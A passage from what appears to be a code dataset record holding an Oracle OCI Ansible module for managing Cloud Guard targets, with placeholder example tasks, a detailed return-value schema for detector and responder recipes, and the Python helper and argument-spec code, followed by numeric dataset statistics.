oci_cloud_guard_target:
display_name: display_name_example
compartment_id: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
lifecycle_state: CREATING
freeform_tags: {'Department': 'Finance'}
defined_tags: {'Operations': {'CostCenter': 'US'}}
- name: Update target
oci_cloud_guard_target:
display_name: display_name_example
target_id: "ocid1.target.oc1..xxxxxxEXAMPLExxxxxx"
- name: Delete target
oci_cloud_guard_target:
target_id: "ocid1.target.oc1..xxxxxxEXAMPLExxxxxx"
state: absent
- name: Delete target using name (when environment variable OCI_USE_NAME_AS_IDENTIFIER is set)
oci_cloud_guard_target:
display_name: display_name_example
compartment_id: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
state: absent
"""
RETURN = """
target:
description:
- Details of the Target resource acted upon by the current operation
returned: on success
type: complex
contains:
id:
description:
- Unique identifier that is immutable on creation
returned: on success
type: str
sample: "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx"
display_name:
description:
- Target Identifier, can be renamed
returned: on success
type: str
sample: display_name_example
compartment_id:
description:
- Compartment Identifier where the resource is created
returned: on success
type: str
sample: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
description:
description:
- The target description.
returned: on success
type: str
sample: description_example
target_resource_type:
description:
- possible type of targets
returned: on success
type: str
sample: COMPARTMENT
target_resource_id:
description:
- Resource ID which the target uses to monitor
returned: on success
type: str
sample: "ocid1.targetresource.oc1..xxxxxxEXAMPLExxxxxx"
recipe_count:
description:
- Total number of recipes attached to target
returned: on success
type: int
sample: 56
target_detector_recipes:
description:
- List of detector recipes associated with target
returned: on success
type: complex
contains:
id:
description:
- Ocid for detector recipe
returned: on success
type: str
sample: "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx"
display_name:
description:
- DisplayName of detector recipe
returned: on success
type: str
sample: display_name_example
description:
description:
- Detector recipe description
returned: on success
type: str
sample: description_example
compartment_id:
description:
- compartmentId of detector recipe
returned: on success
type: str
sample: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
detector_recipe_id:
description:
- Unique identifier for Detector Recipe of which this is an extension
returned: on success
type: str
sample: "ocid1.detectorrecipe.oc1..xxxxxxEXAMPLExxxxxx"
owner:
description:
- Owner of detector recipe
returned: on success
type: str
sample: CUSTOMER
detector:
description:
- Type of detector
returned: on success
type: str
sample: IAAS_ACTIVITY_DETECTOR
detector_rules:
description:
- "List of detector rules for the detector type for recipe - user input"
returned: on success
type: complex
contains:
detector_rule_id:
description:
- The unique identifier of the detector rule
returned: on success
type: str
sample: "ocid1.detectorrule.oc1..xxxxxxEXAMPLExxxxxx"
display_name:
description:
- displayName
returned: on success
type: str
sample: display_name_example
description:
description:
- Description for TargetDetectorRecipeDetectorRule
returned: on success
type: str
sample: description_example
recommendation:
description:
- Recommendation for TargetDetectorRecipeDetectorRule
returned: on success
type: str
sample: recommendation_example
detector:
description:
- detector for the rule
returned: on success
type: str
sample: IAAS_ACTIVITY_DETECTOR
service_type:
description:
- service type of the configuration to which the rule is applied
returned: on success
type: str
sample: service_type_example
resource_type:
description:
- resource type of the configuration to which the rule is applied
returned: on success
type: str
sample: resource_type_example
details:
description:
- ""
returned: on success
type: complex
contains:
is_enabled:
description:
- Enables the control
returned: on success
type: bool
sample: true
risk_level:
description:
- The Risk Level
returned: on success
type: str
sample: CRITICAL
configurations:
description:
- Configuration details
returned: on success
type: complex
contains:
config_key:
description:
- Unique name of the configuration
returned: on success
type: str
sample: config_key_example
name:
description:
- configuration name
returned: on success
type: str
sample: name_example
value:
description:
- configuration value
returned: on success
type: str
sample: value_example
data_type:
description:
- configuration data type
returned: on success
type: str
sample: data_type_example
values:
description:
- List of configuration values
returned: on success
type: complex
contains:
list_type:
description:
- configuration list item type, either CUSTOM or MANAGED
returned: on success
type: str
sample: MANAGED
managed_list_type:
description:
- type of the managed list
returned: on success
type: str
sample: managed_list_type_example
value:
description:
- configuration value
returned: on success
type: str
sample: value_example
condition_groups:
description:
- Condition group corresponding to each compartment
returned: on success
type: complex
contains:
compartment_id:
description:
- compartment associated with condition
returned: on success
type: str
sample: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
condition:
description:
- ""
returned: on success
type: complex
contains:
kind:
description:
- Type of condition object
returned: on success
type: str
sample: COMPOSITE
left_operand:
description:
- ""
returned: on success
type: complex
contains:
kind:
description:
- Type of condition object
returned: on success
type: str
sample: COMPOSITE
composite_operator:
description:
- ""
returned: on success
type: str
sample: AND
right_operand:
description:
- ""
returned: on success
type: complex
contains:
kind:
description:
- Type of condition object
returned: on success
type: str
sample: COMPOSITE
parameter:
description:
- parameter Key
returned: on success
type: str
sample: parameter_example
operator:
description:
- type of operator
returned: on success
type: str
sample: IN
value:
description:
- type of operator
returned: on success
type: str
sample: value_example
value_type:
description:
- type of value
returned: on success
type: str
sample: MANAGED
labels:
description:
- user defined labels for a detector rule
returned: on success
type: list
sample: []
is_configuration_allowed:
description:
- configuration allowed or not
returned: on success
type: bool
sample: true
managed_list_types:
description:
- List of cloudguard managed list types related to this rule
returned: on success
type: list
sample: []
time_created:
description:
- The date and time the target detector recipe rule was created. Format defined by RFC3339.
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
time_updated:
description:
- The date and time the target detector recipe rule was updated. Format defined by RFC3339.
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
lifecycle_state:
description:
- The current state of the DetectorRule.
returned: on success
type: str
sample: CREATING
lifecycle_details:
description:
- A message describing the current state in more detail. For example, can be used to provide actionable information for a
resource in Failed state.
returned: on success
type: str
sample: lifecycle_details_example
effective_detector_rules:
description:
- List of effective detector rules for the detector type for recipe after applying defaults
returned: on success
type: complex
contains:
detector_rule_id:
description:
- The unique identifier of the detector rule
returned: on success
type: str
sample: "ocid1.detectorrule.oc1..xxxxxxEXAMPLExxxxxx"
display_name:
description:
- displayName
returned: on success
type: str
sample: display_name_example
description:
description:
- Description for TargetDetectorRecipeDetectorRule
returned: on success
type: str
sample: description_example
recommendation:
description:
- Recommendation for TargetDetectorRecipeDetectorRule
returned: on success
type: str
sample: recommendation_example
detector:
description:
- detector for the rule
returned: on success
type: str
sample: IAAS_ACTIVITY_DETECTOR
service_type:
description:
- service type of the configuration to which the rule is applied
returned: on success
type: str
sample: service_type_example
resource_type:
description:
- resource type of the configuration to which the rule is applied
returned: on success
type: str
sample: resource_type_example
details:
description:
- ""
returned: on success
type: complex
contains:
is_enabled:
description:
- Enables the control
returned: on success
type: bool
sample: true
risk_level:
description:
- The Risk Level
returned: on success
type: str
sample: CRITICAL
configurations:
description:
- Configuration details
returned: on success
type: complex
contains:
config_key:
description:
- Unique name of the configuration
returned: on success
type: str
sample: config_key_example
name:
description:
- configuration name
returned: on success
type: str
sample: name_example
value:
description:
- configuration value
returned: on success
type: str
sample: value_example
data_type:
description:
- configuration data type
returned: on success
type: str
sample: data_type_example
values:
description:
- List of configuration values
returned: on success
type: complex
contains:
list_type:
description:
- configuration list item type, either CUSTOM or MANAGED
returned: on success
type: str
sample: MANAGED
managed_list_type:
description:
- type of the managed list
returned: on success
type: str
sample: managed_list_type_example
value:
description:
- configuration value
returned: on success
type: str
sample: value_example
condition_groups:
description:
- Condition group corresponding to each compartment
returned: on success
type: complex
contains:
compartment_id:
description:
- compartment associated with condition
returned: on success
type: str
sample: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
condition:
description:
- ""
returned: on success
type: complex
contains:
kind:
description:
- Type of condition object
returned: on success
type: str
sample: COMPOSITE
left_operand:
description:
- ""
returned: on success
type: complex
contains:
kind:
description:
- Type of condition object
returned: on success
type: str
sample: COMPOSITE
composite_operator:
description:
- ""
returned: on success
type: str
sample: AND
right_operand:
description:
- ""
returned: on success
type: complex
contains:
kind:
description:
- Type of condition object
returned: on success
type: str
sample: COMPOSITE
parameter:
description:
- parameter Key
returned: on success
type: str
sample: parameter_example
operator:
description:
- type of operator
returned: on success
type: str
sample: IN
value:
description:
- type of operator
returned: on success
type: str
sample: value_example
value_type:
description:
- type of value
returned: on success
type: str
sample: MANAGED
labels:
description:
- user defined labels for a detector rule
returned: on success
type: list
sample: []
is_configuration_allowed:
description:
- configuration allowed or not
returned: on success
type: bool
sample: true
managed_list_types:
description:
- List of cloudguard managed list types related to this rule
returned: on success
type: list
sample: []
time_created:
description:
- The date and time the target detector recipe rule was created. Format defined by RFC3339.
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
time_updated:
description:
- The date and time the target detector recipe rule was updated. Format defined by RFC3339.
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
lifecycle_state:
description:
- The current state of the DetectorRule.
returned: on success
type: str
sample: CREATING
lifecycle_details:
description:
- A message describing the current state in more detail. For example, can be used to provide actionable information for a
resource in Failed state.
returned: on success
type: str
sample: lifecycle_details_example
time_created:
description:
- The date and time the target detector recipe was created. Format defined by RFC3339.
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
time_updated:
description:
- The date and time the target detector recipe was updated. Format defined by RFC3339.
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
lifecycle_state:
description:
- The current state of the resource.
returned: on success
type: str
sample: CREATING
target_responder_recipes:
description:
- List of responder recipes associated with target
returned: on success
type: complex
contains:
id:
description:
- Unique identifier of TargetResponderRecipe that is immutable on creation
returned: on success
type: str
sample: "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx"
responder_recipe_id:
description:
- Unique identifier for Responder Recipe of which this is an extension
returned: on success
type: str
sample: "ocid1.responderrecipe.oc1..xxxxxxEXAMPLExxxxxx"
compartment_id:
description:
- Compartment Identifier
returned: on success
type: str
sample: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
display_name:
description:
- ResponderRecipe Identifier Name
returned: on success
type: str
sample: display_name_example
description:
description:
- ResponderRecipe Description
returned: on success
type: str
sample: description_example
owner:
description:
- Owner of ResponderRecipe
returned: on success
type: str
sample: CUSTOMER
time_created:
description:
- The date and time the target responder recipe rule was created. Format defined by RFC3339.
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
time_updated:
description:
- The date and time the target responder recipe rule was updated. Format defined by RFC3339.
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
responder_rules:
description:
- "List of responder rules associated with the recipe - user input"
returned: on success
type: complex
contains:
responder_rule_id:
description:
- Identifier for ResponderRule.
returned: on success
type: str
sample: "ocid1.responderrule.oc1..xxxxxxEXAMPLExxxxxx"
display_name:
description:
- ResponderRule Display Name
returned: on success
type: str
sample: display_name_example
description:
description:
- ResponderRule Description
returned: on success
type: str
sample: description_example
type:
description:
- Type of Responder
returned: on success
type: str
sample: REMEDIATION
policies:
description:
- List of Policy
returned: on success
type: list
sample: []
supported_modes:
description:
- Supported Execution Modes
returned: on success
type: list
sample: []
details:
description:
- ""
returned: on success
type: complex
contains:
condition:
description:
- ""
returned: on success
type: complex
contains:
kind:
description:
- Type of condition object
returned: on success
type: str
sample: COMPOSITE
left_operand:
description:
- ""
returned: on success
type: complex
contains:
kind:
description:
- Type of condition object
returned: on success
type: str
sample: COMPOSITE
composite_operator:
description:
- ""
returned: on success
type: str
sample: AND
right_operand:
description:
- ""
returned: on success
type: complex
contains:
kind:
description:
- Type of condition object
returned: on success
type: str
sample: COMPOSITE
parameter:
description:
- parameter Key
returned: on success
type: str
sample: parameter_example
operator:
description:
- type of operator
returned: on success
type: str
sample: IN
value:
description:
- type of operator
returned: on success
type: str
sample: value_example
value_type:
description:
- type of value
returned: on success
type: str
sample: MANAGED
configurations:
description:
- ResponderRule configurations
returned: on success
type: complex
contains:
config_key:
description:
- Unique name of the configuration
returned: on success
type: str
sample: config_key_example
name:
description:
- configuration name
returned: on success
type: str
sample: name_example
value:
description:
- configuration value
returned: on success
type: str
sample: value_example
is_enabled:
description:
- Identifies state for ResponderRule
returned: on success
type: bool
sample: true
mode:
description:
- Execution Mode for ResponderRule
returned: on success
type: str
sample: AUTOACTION
compartment_id:
description:
- Compartment Identifier
returned: on success
type: str
sample: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
time_created:
description:
- The date and time the target responder recipe rule was created. Format defined by RFC3339.
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
time_updated:
description:
- The date and time the target responder recipe rule was updated. Format defined by RFC3339.
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
lifecycle_state:
description:
- The current state of the ResponderRule.
returned: on success
type: str
sample: CREATING
lifecycle_details:
description:
- A message describing the current state in more detail. For example, can be used to provide actionable information for a
resource in Failed state.
returned: on success
type: str
sample: lifecycle_details_example
effective_responder_rules:
description:
- List of responder rules associated with the recipe after applying all defaults
returned: on success
type: complex
contains:
responder_rule_id:
description:
- Identifier for ResponderRule.
returned: on success
type: str
sample: "ocid1.responderrule.oc1..xxxxxxEXAMPLExxxxxx"
display_name:
description:
- ResponderRule Display Name
returned: on success
type: str
sample: display_name_example
description:
description:
- ResponderRule Description
returned: on success
type: str
sample: description_example
type:
description:
- Type of Responder
returned: on success
type: str
sample: REMEDIATION
policies:
description:
- List of Policy
returned: on success
type: list
sample: []
supported_modes:
description:
- Supported Execution Modes
returned: on success
type: list
sample: []
details:
description:
- ""
returned: on success
type: complex
contains:
condition:
description:
- ""
returned: on success
type: complex
contains:
kind:
description:
- Type of condition object
returned: on success
type: str
sample: COMPOSITE
left_operand:
description:
- ""
returned: on success
type: complex
contains:
kind:
description:
- Type of condition object
returned: on success
type: str
sample: COMPOSITE
composite_operator:
description:
- ""
returned: on success
type: str
sample: AND
right_operand:
description:
- ""
returned: on success
type: complex
contains:
kind:
description:
- Type of condition object
returned: on success
type: str
sample: COMPOSITE
parameter:
description:
- parameter Key
returned: on success
type: str
sample: parameter_example
operator:
description:
- type of operator
returned: on success
type: str
sample: IN
value:
description:
- type of operator
returned: on success
type: str
sample: value_example
value_type:
description:
- type of value
returned: on success
type: str
sample: MANAGED
configurations:
description:
- ResponderRule configurations
returned: on success
type: complex
contains:
config_key:
description:
- Unique name of the configuration
returned: on success
type: str
sample: config_key_example
name:
description:
- configuration name
returned: on success
type: str
sample: name_example
value:
description:
- configuration value
returned: on success
type: str
sample: value_example
is_enabled:
description:
- Identifies state for ResponderRule
returned: on success
type: bool
sample: true
mode:
description:
- Execution Mode for ResponderRule
returned: on success
type: str
sample: AUTOACTION
compartment_id:
description:
- Compartment Identifier
returned: on success
type: str
sample: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
time_created:
description:
- The date and time the target responder recipe rule was created. Format defined by RFC3339.
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
time_updated:
description:
- The date and time the target responder recipe rule was updated. Format defined by RFC3339.
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
lifecycle_state:
description:
- The current state of the ResponderRule.
returned: on success
type: str
sample: CREATING
lifecycle_details:
description:
- A message describing the current state in more detail. For example, can be used to provide actionable information for a
resource in Failed state.
returned: on success
type: str
sample: lifecycle_details_example
inherited_by_compartments:
description:
- List of inherited compartments
returned: on success
type: list
sample: []
time_created:
description:
- The date and time the target was created. Format defined by RFC3339.
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
time_updated:
description:
- The date and time the target was updated. Format defined by RFC3339.
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
lifecycle_state:
description:
- The current state of the Target.
returned: on success
type: str
sample: CREATING
lifecyle_details:
description:
- A message describing the current state in more detail. For example, can be used to provide actionable information for a resource in Failed
state.
returned: on success
type: str
sample: lifecyle_details_example
freeform_tags:
description:
- "Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only.
Example: `{\\"bar-key\\": \\"value\\"}`"
returned: on success
type: dict
sample: {'Department': 'Finance'}
defined_tags:
description:
- "Defined tags for this resource. Each key is predefined and scoped to a namespace.
Example: `{\\"foo-namespace\\": {\\"bar-key\\": \\"value\\"}}`"
returned: on success
type: dict
sample: {'Operations': {'CostCenter': 'US'}}
system_tags:
description:
- System tags for this resource. Each key is predefined and scoped to a namespace.
For more information, see L(Resource Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).
System tags can be viewed by users, but can only be created by the system.
- "Example: `{\\"orcl-cloud\\": {\\"free-tier-retained\\": \\"true\\"}}`"
returned: on success
type: dict
sample: {}
sample: {
"id": "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx",
"display_name": "display_name_example",
"compartment_id": "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx",
"description": "description_example",
"target_resource_type": "COMPARTMENT",
"target_resource_id": "ocid1.targetresource.oc1..xxxxxxEXAMPLExxxxxx",
"recipe_count": 56,
"target_detector_recipes": [{
"id": "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx",
"display_name": "display_name_example",
"description": "description_example",
"compartment_id": "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx",
"detector_recipe_id": "ocid1.detectorrecipe.oc1..xxxxxxEXAMPLExxxxxx",
"owner": "CUSTOMER",
"detector": "IAAS_ACTIVITY_DETECTOR",
"detector_rules": [{
"detector_rule_id": "ocid1.detectorrule.oc1..xxxxxxEXAMPLExxxxxx",
"display_name": "display_name_example",
"description": "description_example",
"recommendation": "recommendation_example",
"detector": "IAAS_ACTIVITY_DETECTOR",
"service_type": "service_type_example",
"resource_type": "resource_type_example",
"details": {
"is_enabled": true,
"risk_level": "CRITICAL",
"configurations": [{
"config_key": "config_key_example",
"name": "name_example",
"value": "value_example",
"data_type": "data_type_example",
"values": [{
"list_type": "MANAGED",
"managed_list_type": "managed_list_type_example",
"value": "value_example"
}]
}],
"condition_groups": [{
"compartment_id": "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx",
"condition": {
"kind": "COMPOSITE",
"left_operand": {
"kind": "COMPOSITE"
},
"composite_operator": "AND",
"right_operand": {
"kind": "COMPOSITE"
},
"parameter": "parameter_example",
"operator": "IN",
"value": "value_example",
"value_type": "MANAGED"
}
}],
"labels": [],
"is_configuration_allowed": true
},
"managed_list_types": [],
"time_created": "2013-10-20T19:20:30+01:00",
"time_updated": "2013-10-20T19:20:30+01:00",
"lifecycle_state": "CREATING",
"lifecycle_details": "lifecycle_details_example"
}],
"effective_detector_rules": [{
"detector_rule_id": "ocid1.detectorrule.oc1..xxxxxxEXAMPLExxxxxx",
"display_name": "display_name_example",
"description": "description_example",
"recommendation": "recommendation_example",
"detector": "IAAS_ACTIVITY_DETECTOR",
"service_type": "service_type_example",
"resource_type": "resource_type_example",
"details": {
"is_enabled": true,
"risk_level": "CRITICAL",
"configurations": [{
"config_key": "config_key_example",
"name": "name_example",
"value": "value_example",
"data_type": "data_type_example",
"values": [{
"list_type": "MANAGED",
"managed_list_type": "managed_list_type_example",
"value": "value_example"
}]
}],
"condition_groups": [{
"compartment_id": "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx",
"condition": {
"kind": "COMPOSITE",
"left_operand": {
"kind": "COMPOSITE"
},
"composite_operator": "AND",
"right_operand": {
"kind": "COMPOSITE"
},
"parameter": "parameter_example",
"operator": "IN",
"value": "value_example",
"value_type": "MANAGED"
}
}],
"labels": [],
"is_configuration_allowed": true
},
"managed_list_types": [],
"time_created": "2013-10-20T19:20:30+01:00",
"time_updated": "2013-10-20T19:20:30+01:00",
"lifecycle_state": "CREATING",
"lifecycle_details": "lifecycle_details_example"
}],
"time_created": "2013-10-20T19:20:30+01:00",
"time_updated": "2013-10-20T19:20:30+01:00",
"lifecycle_state": "CREATING"
}],
"target_responder_recipes": [{
"id": "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx",
"responder_recipe_id": "ocid1.responderrecipe.oc1..xxxxxxEXAMPLExxxxxx",
"compartment_id": "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx",
"display_name": "display_name_example",
"description": "description_example",
"owner": "CUSTOMER",
"time_created": "2013-10-20T19:20:30+01:00",
"time_updated": "2013-10-20T19:20:30+01:00",
"responder_rules": [{
"responder_rule_id": "ocid1.responderrule.oc1..xxxxxxEXAMPLExxxxxx",
"display_name": "display_name_example",
"description": "description_example",
"type": "REMEDIATION",
"policies": [],
"supported_modes": [],
"details": {
"condition": {
"kind": "COMPOSITE",
"left_operand": {
"kind": "COMPOSITE"
},
"composite_operator": "AND",
"right_operand": {
"kind": "COMPOSITE"
},
"parameter": "parameter_example",
"operator": "IN",
"value": "value_example",
"value_type": "MANAGED"
},
"configurations": [{
"config_key": "config_key_example",
"name": "name_example",
"value": "value_example"
}],
"is_enabled": true,
"mode": "AUTOACTION"
},
"compartment_id": "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx",
"time_created": "2013-10-20T19:20:30+01:00",
"time_updated": "2013-10-20T19:20:30+01:00",
"lifecycle_state": "CREATING",
"lifecycle_details": "lifecycle_details_example"
}],
"effective_responder_rules": [{
"responder_rule_id": "ocid1.responderrule.oc1..xxxxxxEXAMPLExxxxxx",
"display_name": "display_name_example",
"description": "description_example",
"type": "REMEDIATION",
"policies": [],
"supported_modes": [],
"details": {
"condition": {
"kind": "COMPOSITE",
"left_operand": {
"kind": "COMPOSITE"
},
"composite_operator": "AND",
"right_operand": {
"kind": "COMPOSITE"
},
"parameter": "parameter_example",
"operator": "IN",
"value": "value_example",
"value_type": "MANAGED"
},
"configurations": [{
"config_key": "config_key_example",
"name": "name_example",
"value": "value_example"
}],
"is_enabled": true,
"mode": "AUTOACTION"
},
"compartment_id": "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx",
"time_created": "2013-10-20T19:20:30+01:00",
"time_updated": "2013-10-20T19:20:30+01:00",
"lifecycle_state": "CREATING",
"lifecycle_details": "lifecycle_details_example"
}]
}],
"inherited_by_compartments": [],
"time_created": "2013-10-20T19:20:30+01:00",
"time_updated": "2013-10-20T19:20:30+01:00",
"lifecycle_state": "CREATING",
"lifecyle_details": "lifecyle_details_example",
"freeform_tags": {'Department': 'Finance'},
"defined_tags": {'Operations': {'CostCenter': 'US'}},
"system_tags": {}
}
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.oracle.oci.plugins.module_utils import (
oci_common_utils,
oci_wait_utils,
)
from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (
OCIResourceHelperBase,
get_custom_class,
)
try:
from oci.cloud_guard import CloudGuardClient
from oci.cloud_guard.models import CreateTargetDetails
from oci.cloud_guard.models import UpdateTargetDetails
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
class TargetHelperGen(OCIResourceHelperBase):
"""Supported operations: create, update, get, list and delete"""
def get_module_resource_id_param(self):
return "target_id"
def get_module_resource_id(self):
return self.module.params.get("target_id")
def get_get_fn(self):
return self.client.get_target
def get_resource(self):
return oci_common_utils.call_with_backoff(
self.client.get_target, target_id=self.module.params.get("target_id"),
)
def get_required_kwargs_for_list(self):
required_list_method_params = [
"compartment_id",
]
return dict(
(param, self.module.params[param]) for param in required_list_method_params
)
def get_optional_kwargs_for_list(self):
optional_list_method_params = (
["display_name"]
if self._use_name_as_identifier()
else ["display_name", "lifecycle_state"]
)
return dict(
(param, self.module.params[param])
for param in optional_list_method_params
if self.module.params.get(param) is not None
and (
self._use_name_as_identifier()
or (
not self.module.params.get("key_by")
or param in self.module.params.get("key_by")
)
)
)
def list_resources(self):
required_kwargs = self.get_required_kwargs_for_list()
optional_kwargs = self.get_optional_kwargs_for_list()
kwargs = oci_common_utils.merge_dicts(required_kwargs, optional_kwargs)
return oci_common_utils.list_all_resources(self.client.list_targets, **kwargs)
def get_create_model_class(self):
return CreateTargetDetails
def create_resource(self):
create_details = self.get_create_model()
return oci_wait_utils.call_and_wait(
call_fn=self.client.create_target,
call_fn_args=(),
call_fn_kwargs=dict(create_target_details=create_details,),
waiter_type=oci_wait_utils.LIFECYCLE_STATE_WAITER_KEY,
operation=oci_common_utils.CREATE_OPERATION_KEY,
waiter_client=self.get_waiter_client(),
resource_helper=self,
wait_for_states=self.get_wait_for_states_for_operation(
oci_common_utils.CREATE_OPERATION_KEY,
),
)
def get_update_model_class(self):
return UpdateTargetDetails
def update_resource(self):
update_details = self.get_update_model()
return oci_wait_utils.call_and_wait(
call_fn=self.client.update_target,
call_fn_args=(),
call_fn_kwargs=dict(
target_id=self.module.params.get("target_id"),
update_target_details=update_details,
),
waiter_type=oci_wait_utils.LIFECYCLE_STATE_WAITER_KEY,
operation=oci_common_utils.UPDATE_OPERATION_KEY,
waiter_client=self.get_waiter_client(),
resource_helper=self,
wait_for_states=self.get_wait_for_states_for_operation(
oci_common_utils.UPDATE_OPERATION_KEY,
),
)
def delete_resource(self):
return oci_wait_utils.call_and_wait(
call_fn=self.client.delete_target,
call_fn_args=(),
call_fn_kwargs=dict(target_id=self.module.params.get("target_id"),),
waiter_type=oci_wait_utils.LIFECYCLE_STATE_WAITER_KEY,
operation=oci_common_utils.DELETE_OPERATION_KEY,
waiter_client=self.get_waiter_client(),
resource_helper=self,
wait_for_states=self.get_wait_for_states_for_operation(
oci_common_utils.DELETE_OPERATION_KEY,
),
)
TargetHelperCustom = get_custom_class("TargetHelperCustom")
class ResourceHelper(TargetHelperCustom, TargetHelperGen):
pass
def main():
module_args = oci_common_utils.get_common_arg_spec(
supports_create=True, supports_wait=True
)
module_args.update(
dict(
display_name=dict(aliases=["name"], type="str"),
compartment_id=dict(type="str"),
description=dict(type="str"),
target_resource_type=dict(
type="str", choices=["COMPARTMENT", "ERPCLOUD", "HCMCLOUD"]
),
target_resource_id=dict(type="str"),
target_detector_recipes=dict(
type="list",
elements="dict",
options=dict(
detector_recipe_id=dict(type="str"),
detector_rules=dict(
type="list",
elements="dict",
options=dict(
detector_rule_id=dict(type="str", required=True),
details=dict(
type="dict",
required=True,
options=dict(
condition_groups=dict(
type="list",
elements="dict",
options=dict(
compartment_id=dict(
type="str", required=True
),
condition=dict(
type="dict",
required=True,
options=dict(
kind=dict(
type="str",
required=True,
choices=["SIMPLE", "COMPOSITE"],
),
parameter=dict(type="str"),
operator=dict(
type="str",
choices=[
"IN",
"NOT_IN",
"EQUALS",
"NOT_EQUALS",
],
),
value=dict(type="str"),
value_type=dict(
type="str",
choices=["MANAGED", "CUSTOM"],
),
left_operand=dict(
type="dict",
options=dict(
kind=dict(
type="str",
required=True,
choices=[
"COMPOSITE",
"SIMPLE",
],
)
),
),
composite_operator=dict(
type="str",
choices=["AND", "OR"],
),
right_operand=dict(
type="dict",
options=dict(
kind=dict(
type="str",
required=True,
choices=[
"COMPOSITE",
"SIMPLE",
],
)
),
),
),
),
),
)
),
),
),
),
target_detector_recipe_id=dict(type="str"),
),
),
target_responder_recipes=dict(
type="list",
elements="dict",
options=dict(
responder_recipe_id=dict(type="str"),
responder_rules=dict(
type="list",
elements="dict",
options=dict(
responder_rule_id=dict(type="str", required=True),
details=dict(
type="dict",
required=True,
options=dict(
condition=dict(
type="dict",
options=dict(
kind=dict(
type="str",
required=True,
choices=["SIMPLE", "COMPOSITE"],
),
parameter=dict(type="str"),
operator=dict(
type="str",
choices=[
"IN",
"NOT_IN",
"EQUALS",
"NOT_EQUALS",
],
),
value=dict(type="str"),
value_type=dict(
type="str",
choices=["MANAGED", "CUSTOM"],
),
left_operand=dict(
type="dict",
options=dict(
kind=dict(
type="str",
required=True,
choices=["COMPOSITE", "SIMPLE"],
)
),
),
composite_operator=dict(
type="str", choices=["AND", "OR"]
),
right_operand=dict(
type="dict",
options=dict(
kind=dict(
type="str",
required=True,
choices=["COMPOSITE", "SIMPLE"],
)
),
),
),
),
configurations=dict(
type="list",
elements="dict",
options=dict(
config_key=dict(
type="str", required=True, no_log=True
),
name=dict(type="str", required=True),
value=dict(type="str", required=True),
),
),
mode=dict(
type="str", choices=["AUTOACTION", "USERACTION"]
),
),
),
),
),
target_responder_recipe_id=dict(type="str"),
),
),
lifecycle_state=dict(
type="str",
choices=[
"CREATING",
"UPDATING",
"ACTIVE",
"INACTIVE",
"DELETING",
"DELETED",
"FAILED",
],
),
freeform_tags=dict(type="dict"),
defined_tags=dict(type="dict"),
target_id=dict(aliases=["id"], type="str"),
state=dict(type="str", default="present", choices=["present", "absent"]),
)
)
module = AnsibleModule(argument_spec=module_args, supports_check_mode=True)
if not HAS_OCI_PY_SDK:
module.fail_json(msg="oci python sdk required for this module.")
resource_helper = ResourceHelper(
module=module,
resource_type="target",
service_client_class=CloudGuardClient,
namespace="cloud_guard",
)
result = dict(changed=False)
if resource_helper.is_delete_using_name():
result = resource_helper.delete_using_name()
elif resource_helper.is_delete():
result = resource_helper.delete()
elif resource_helper.is_update_using_name():
result = resource_helper.update_using_name()
elif resource_helper.is_update():
result = resource_helper.update()
elif resource_helper.is_create():
result = resource_helper.create()
module.exit_json(**result)
if __name__ == "__main__":
main()
| 50.196866
| 156
| 0.331184
| 5,731
| 102,502
| 5.770372
| 0.065957
| 0.041488
| 0.090475
| 0.111763
| 0.869035
| 0.836891
| 0.807499
| 0.779196
| 0.754642
| 0.722951
| 0
| 0.017276
| 0.623344
| 102,502
| 2,041
| 157
| 50.22146
| 0.839282
| 0.004302
| 0
| 0.840966
| 0
| 0.005536
| 0.846201
| 0.050476
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006543
| false
| 0.000503
| 0.004026
| 0.003523
| 0.017614
| 0.000503
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
865dc4ddf79c635bc688a33bc3eb6b1fd49bd885
| 17,227
|
py
|
Python
|
Virus-Fake-main/Android.py
|
